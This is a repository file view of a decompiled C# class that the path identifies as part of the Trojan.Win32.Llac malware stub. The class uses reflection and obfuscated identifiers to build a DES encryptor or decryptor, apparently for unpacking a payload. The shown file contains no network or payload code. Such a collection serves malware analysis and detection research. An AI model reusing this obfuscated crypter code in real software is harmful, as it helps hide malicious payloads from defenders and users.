MalwareSourceCode/MSIL/Trojan/Win32/L/Trojan.Win32.Llac.aimt-d60eebfa06f055ff7e8bef8d4507b58d2922f6e9f6682bbf0d9c0884bab4acb2/_0003/_0002.cs
2022-08-18 06:28:56 -05:00

56 lines
1.6 KiB
C#
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Stub, Version=2.0.0.2, Culture=neutral, PublicKeyToken=null
// MVID: 18A6455A-DBC9-4D4B-8699-BEBEFCABEF8D
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Llac.aimt-d60eebfa06f055ff7e8bef8d4507b58d2922f6e9f6682bbf0d9c0884bab4acb2.exe
using System;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
namespace \u0003
{
internal sealed class \u0002 : IDisposable
{
private readonly Type \u0001;
private readonly object \u0001;
public \u0002()
{
this.\u0001 = Assembly.Load("mscorlib").GetType("System.Security.Cryptography.DESCryptoServiceProvider");
this.\u0001 = Activator.CreateInstance(this.\u0001);
}
public ICryptoTransform \u0002([In] byte[] obj0, [In] byte[] obj1, [In] bool obj2)
{
this.\u0001.GetProperty("Key").GetSetMethod().Invoke(this.\u0001, new object[1]
{
(object) obj0
});
this.\u0001.GetProperty("IV").GetSetMethod().Invoke(this.\u0001, new object[1]
{
(object) obj1
});
return (ICryptoTransform) this.\u0001.GetMethod(obj2 ? "CreateDecryptor" : "CreateEncryptor", new Type[0]).Invoke(this.\u0001, new object[0]);
}
public void \u0002()
{
do
{
if (true)
goto label_3;
label_2:
continue;
label_3:
this.\u0001.GetMethod("Clear").Invoke(this.\u0001, new object[0]);
goto label_2;
}
while (false);
}
public void Dispose() => this.\u0002();
}
}